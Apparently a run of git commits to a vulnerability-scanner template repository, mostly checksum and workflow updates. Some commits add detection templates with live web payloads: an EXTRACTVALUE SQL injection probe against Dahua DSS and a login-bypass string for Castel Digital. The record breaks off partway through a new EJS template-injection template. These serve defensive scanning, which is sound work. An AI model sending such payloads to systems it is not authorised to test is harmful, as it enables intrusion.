+cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:4f082a6a5aed38fdbf01a3194fbaffc4cd799a8a cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:ca1a07dc81a0071d64ab7a4d9868367d1c7465ea cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:c5c333bcd31a6282a913a9cfe7a440566ed1bb78 cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:4fd566c83837e16dbc3b4db04b840b0abcba2804 @@ -3170,6 +3170,7 @@ http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 +http/cves/2023/CVE-2023-45855.yaml:b4a5227dca9bd15ee6d351f393163365ffb9318d http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96 @@ -8517,7 +8518,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4950e75d142c90a986cb044a223fd568225adc38 +templates-checksum.txt:84293d553209b0481f69e794cb556fc5e4c80bd9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 38323f77bf45ccc692e1862d559bf9558845bae0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 03:58:37 +0000 Subject: [PATCH 207/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d171f57fa8..fa8857443f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' + - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' From 998d0371c8b5ee24e812461b621c3acad4ccaa25 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 03:59:49 +0000 Subject: [PATCH 208/375] Auto Template Signing [Tue May 14 03:59:49 UTC 2024] :robot: --- http/cves/2023/CVE-2023-45855.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index db33f12afc..60276771a7 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100cbd700fb07947d7ab0657ac97cf57a41ceb390ba95b91f5ebd3eb5dc4ed2246b02210086b07d8dd2293a1fc75a3d80d0c9dcf34ddff95b979e4eccefddd9d1fc606ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5c529902106353fc169030cdc0a31bb43ea1be42 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 09:56:02 +0530 Subject: [PATCH 209/375] Create CNVD-2017-06001.yaml --- http/cnvd/2017/CNVD-2017-06001.yaml | 36 +++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cnvd/2017/CNVD-2017-06001.yaml diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml new file mode 100644 index 0000000000..af3c4d90a5 --- /dev/null +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -0,0 +1,36 @@ +id: CNVD-2017-06001 + +info: + name: Dahua DSS - SQL Injection + severity: high + author: napgh0st,ritikchaddha + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001 + metadata: + max-request: 1 + verified: true + fofa-query: app="dahua-DSS" + tags: cnvd,cnvd2017,sqli,dahua + +variables: + num: "999999999" + +http: + - method: GET + path: + - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1" + - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1" + + stop-at-first-match: true + + matchers: + - type: word + part: body + words: + - "XPATH syntax error:" + - "c8c605999f3d8352d7bb792cf3fdb25" + condition: and + + - type: status + status: + - 200 From ed191f320bdad5d94f0259cf57e152971118d267 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 04:54:16 +0000 Subject: [PATCH 210/375] Auto Generated New Template Addition List [Tue May 14 04:54:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c2172fbbf9..2521506a46 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cnvd/2017/CNVD-2017-06001.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml From 1a72df06967cbad5c63515f176aa1f3ce646cf1d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 04:54:22 +0000 Subject: [PATCH 211/375] Auto Generated Templates Checksum [Tue May 14 04:54:22 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 14b52594f4..415c73596e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -841,6 +841,7 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 +http/cnvd/2017/CNVD-2017-06001.yaml:2f1e819ea2e5842a24aa1cd570f53f666298ecf3 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6 @@ -3170,7 +3171,7 @@ http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 -http/cves/2023/CVE-2023-45855.yaml:b4a5227dca9bd15ee6d351f393163365ffb9318d +http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96 @@ -8518,7 +8519,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:84293d553209b0481f69e794cb556fc5e4c80bd9 +templates-checksum.txt:8fa102191bfcbb0bb2ed8e234dc7f050af89b78e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From aabdb13bfc0ed74f2abc469f9e23b1dbd8cd071e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 04:54:57 +0000 Subject: [PATCH 212/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index fa8857443f..8fe50254e8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cnvd/2017/CNVD-2017-06001.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' From 69915742f185740588ba5f6c65a94f28ccca76f9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 10:25:58 +0530 Subject: [PATCH 213/375] Update CNVD-2017-06001.yaml --- http/cnvd/2017/CNVD-2017-06001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index af3c4d90a5..2ee033bd59 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -22,7 +22,7 @@ http: - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1" stop-at-first-match: true - + matchers-condition: and matchers: - type: word part: body From d9ca0fee43c5c99da3c31d4d3539db01a5972232 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 04:56:02 +0000 Subject: [PATCH 214/375] Auto Template Signing [Tue May 14 04:56:02 UTC 2024] :robot: --- http/cnvd/2017/CNVD-2017-06001.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index af3c4d90a5..0f89b746ca 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f1c4bc930e8656d19689d25b034f97ba7586fdf09204b452b110a8d4f7afb3230221008cb02b68d90e6958e52106e033c8edaf3f11ddd5afab88b52af8f1ac4f8f874e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c0b90d9bc46539aa514c089a6db647d8af0895d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 04:58:59 +0000 Subject: [PATCH 216/375] Auto Generated Templates Checksum [Tue May 14 04:58:59 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 415c73596e..0456ee2a7f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -841,7 +841,7 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 -http/cnvd/2017/CNVD-2017-06001.yaml:2f1e819ea2e5842a24aa1cd570f53f666298ecf3 +http/cnvd/2017/CNVD-2017-06001.yaml:ecbed63242b439b69b64a3980cb2f0a5b02f1237 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6 @@ -8519,7 +8519,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8fa102191bfcbb0bb2ed8e234dc7f050af89b78e +templates-checksum.txt:f57d4d492e64f6152713dc50ad901f4c072bb779 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7fb9b5555401e212a25c5b4df04d024fc4f1bf91 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 05:00:41 +0000 Subject: [PATCH 217/375] Auto Template Signing [Tue May 14 05:00:41 UTC 2024] :robot: --- http/cnvd/2017/CNVD-2017-06001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index 6ee24c1408..832b701428 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f1c4bc930e8656d19689d25b034f97ba7586fdf09204b452b110a8d4f7afb3230221008cb02b68d90e6958e52106e033c8edaf3f11ddd5afab88b52af8f1ac4f8f874e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f369f94051bc8ede985360f3de46c645769896645c53b702a5900b5d7ec68dc3022100db0215796305ea641958244a283b9f55498c217c5151e9f5e96da70c5c7144d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f5a8fcc9763816b31932f9fb91cb94cdc2eb8fe9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 05:04:54 +0000 Subject: [PATCH 219/375] Auto Generated Templates Checksum [Tue May 14 05:04:54 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0456ee2a7f..4dd9ad8040 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -547,7 +547,7 @@ file/malware/vertex-malware.yaml:dbbbe626d020ae4d7bbd344de80b6a54835ec6b5 file/malware/virusrat-malware.yaml:26139365e8bc1b4ca2b45a9490c34b19f986215e file/malware/wabot-malware.yaml:7d2630471fae89dc585a6cbd284f9bf29e6259d7 file/malware/wannacry-malware.yaml:4d955739e936b2e11fa054b66bb3bcae8b924b49 -file/malware/warp-malware.yaml:9c5955f1a0da020828e0294bcdd0ffae3ed6c6e2 +file/malware/warp-malware.yaml:7a6eca365d2cc7890bfe29d51c03e3b248372d44 file/malware/xhide-malware.yaml:1014bac698098d85b1de13cce518523719c41021 file/malware/xor-ddos-malware.yaml:f5b4f72a7b0ed38d9d6010429fe0bb69181383ce file/malware/yayih-malware.yaml:d0632e660caa87b47d08a264fd0625d587900dc8 @@ -841,7 +841,7 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 -http/cnvd/2017/CNVD-2017-06001.yaml:ecbed63242b439b69b64a3980cb2f0a5b02f1237 +http/cnvd/2017/CNVD-2017-06001.yaml:5ac8e22a95722f256b2676eb6bb0dfff30ee70c9 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6 @@ -8519,7 +8519,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f57d4d492e64f6152713dc50ad901f4c072bb779 +templates-checksum.txt:babc7e838e9005be6a08c999aa2eebb3e7b4d671 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 35f4476242cd6780b066e3e7c8be91d62aead6b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 05:06:21 +0000 Subject: [PATCH 220/375] Auto Template Signing [Tue May 14 05:06:21 UTC 2024] :robot: --- file/malware/warp-malware.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml index 117474c917..eb34685944 100644 --- a/file/malware/warp-malware.yaml +++ b/file/malware/warp-malware.yaml @@ -23,5 +23,4 @@ file: - type: binary binary: - "80382B7503C6002D80382F7503C6005F" - -# digest: 4a0a00473045022100841926e56850756403c4d4035ecc9b7d08e8e0642b013dea6df56a912a82b6c402202ee68a5dcea7ca1703fe713ad85fe77313fc855e95a50ff72976487416ef564c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e80f4b2dd4f9e9816231f6df6fe61c3565dece76d808a3a46eb8834f63cf0400022100a6c76dfe0cf46ebb373f0eb870535044d5b9cbb980fc1ec329159a2ca6e263e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 04dca9e213b574818336879dd95d05537bef0805 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 10:39:07 +0530 Subject: [PATCH 221/375] minor update --- http/technologies/imgproxy-detect.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml index ba654a8528..e61b94f7cc 100644 --- a/http/technologies/imgproxy-detect.yaml +++ b/http/technologies/imgproxy-detect.yaml @@ -11,6 +11,7 @@ info: metadata: verified: true max-request: 1 + shodan-query: html:"imgproxy" tags: imgproxy,tech,detect http: @@ -21,4 +22,6 @@ http: matchers: - type: dsl dsl: - - 'status_code == 200 && contains(server, "imgproxy")' + - 'status_code == 200' + - 'contains(server, "imgproxy")' + condition: and From c4012922ca3a2ebf287382335bab64659d813840 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 10:42:44 +0530 Subject: [PATCH 222/375] minor update --- http/exposed-panels/ghost-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index b565dcdc54..25714ff071 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -5,12 +5,13 @@ info: author: userdehghani severity: info description: | - beautiful, modern publishing with email newsletters and paid subscriptions built-in. + Beautiful, modern publishing with email newsletters and paid subscriptions built-in. reference: - https://ghost.org/ metadata: verified: true max-request: 1 + fofa-query: app="Ghost" tags: panel,ghost,login,detect http: @@ -18,7 +19,6 @@ http: path: - "{{BaseURL}}/ghost/#/signin" - stop-at-first-match: true matchers-condition: or matchers: - type: word From ce3900444e99165be915aaf296285ac4cf1a49a8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 10:49:20 +0530 Subject: [PATCH 223/375] minor update --- http/exposed-panels/n8n-panel.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index 53a0fbd748..b7c335adb8 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -18,10 +18,8 @@ http: - method: GET path: - "{{BaseURL}}/signin" - - "{{BaseURL}}/favicon.ico" - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word part: body @@ -29,6 +27,6 @@ http: - 'n8n.io' case-insensitive: true - - type: dsl - dsl: - - "status_code==200 && (\"-831756631\" == mmh3(base64_py(body)))" + - type: status + status: + - 200 From 00f2c8754cadaaf74b244b728e85d78175d29ae6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 10:54:40 +0530 Subject: [PATCH 224/375] minor update --- http/exposed-panels/pocketbase-panel.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 963b47a412..221c4349db 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -19,10 +19,8 @@ http: - method: GET path: - "{{BaseURL}}/_/#/login" - - "{{BaseURL}}/_/images/favicon/favicon.ico" - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word part: body @@ -30,6 +28,6 @@ http: - '<title>PocketBase' case-insensitive: true - - type: dsl - dsl: - - "status_code==200 && (\"981081715\" == mmh3(base64_py(body)))" + - type: status + status: + - 200 From 5e6f7293fa2f8293ca78d6de2cfc2f4d6d61a22c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 11:01:48 +0530 Subject: [PATCH 225/375] minor update --- .../{ => softether}/softether-vpn-default-login.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) rename http/default-logins/{ => softether}/softether-vpn-default-login.yaml (89%) diff --git a/http/default-logins/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml similarity index 89% rename from http/default-logins/softether-vpn-default-login.yaml rename to http/default-logins/softether/softether-vpn-default-login.yaml index ccab0eea4e..d40d1f073d 100644 --- a/http/default-logins/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -11,6 +11,7 @@ info: metadata: shodan-query: title:"SoftEther VPN Server" verified: true + max-request: 1 tags: panel,vpn,softether,default-login http: @@ -32,7 +33,9 @@ http: - type: word part: body words: - - '<title>SoftEther VPN Server HTML5 Web Administration Console (Under construction!)' + - 'Create new Virtual Hub' + - 'Toggle navigation' + condition: and - type: status status: From 8b61462712bd2820fd02c96121b9ac5b1a1813be Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 11:08:53 +0530 Subject: [PATCH 226/375] minor update --- .../other/castel-digital-sqli.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index c4438fae6b..222857b3da 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -1,17 +1,19 @@ id: castel-digital-sqli info: - name: Castel Digital Authentication Bypass + name: Castel Digital - Authentication Bypass author: Kazgangap severity: high - description: SQL Injection vulnerability in Castel Digital login forms. + description: | + SQL Injection vulnerability in Castel Digital login forms. reference: - https://www.casteldigital.com.br/ - https://cxsecurity.com/issue/WLB-2024050032 metadata: + verified: true + max-request: 2 google-query: "Castel Digital" - tags: sqli,webapps - + tags: sqli,auth-bypass,castel http: - raw: @@ -21,7 +23,7 @@ http: Content-Type: application/x-www-form-urlencoded username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x - + - | GET /restrito/ HTTP/1.1 Host: {{Hostname}} @@ -34,6 +36,7 @@ http: - "Banner" - "Construtoras" condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 From 8fd1b94c600e0ad3af5feb58410946bb105ac503 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 May 2024 12:14:52 +0530 Subject: [PATCH 227/375] minor update --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 04b12668ea..e0ed92d112 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -2,7 +2,7 @@ id: open-redirect info: name: Open Redirect Detection - author: princechaddha, AmirHossein Raeisi + author: princechaddha,AmirHossein Raeisi severity: medium tags: redirect,dast From 0d834ff64947453ef5b0dcc185026183152caf4c Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Tue, 14 May 2024 07:22:52 +0000 Subject: [PATCH 228/375] Update CVE-2015-2863.yaml --- http/cves/2015/CVE-2015-2863.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 3a90c56323..b0ac2537b4 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -2,7 +2,7 @@ id: CVE-2015-2863 info: name: Kaseya Virtual System Administrator - Open Redirect - author: 0x_Akoko + author: 0x_Akoko,AmirHossein Raeisi severity: medium description: | Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. @@ -39,5 +39,5 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 # digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2614f52ab99662c5a3b9b5d60ad7344973d5ca4b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 13:22:09 +0530 Subject: [PATCH 229/375] Create CVE-2023-29827.yaml --- http/cves/2023/CVE-2023-29827.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2023/CVE-2023-29827.yaml diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml new file mode 100644 index 0000000000..815a3b4813 --- /dev/null +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-29827 + +info: + name: Embedded JavaScript(EJS) 3.1.6 - Template Injection + author: ritikchaddha + severity: critical + description: | + ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. + impact: | + High impact as it enables remote code execution. + remediation: | + Update EJS to the latest version to mitigate the vulnerability. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-29827 + cwe-id: CWE-74 + epss-score: 0.34849 + epss-percentile: 0.97005 + cpe: cpe:2.3:a:ejs:ejs:3.1.9:*:*:*:*:node.js:*:* + metadata: + max-request: 1 + vendor: ejs + product: ejs + framework: node.js + tags: cve,cve2023,ssti,rce,ejs,oast + +http: + - method: GET + path: + - 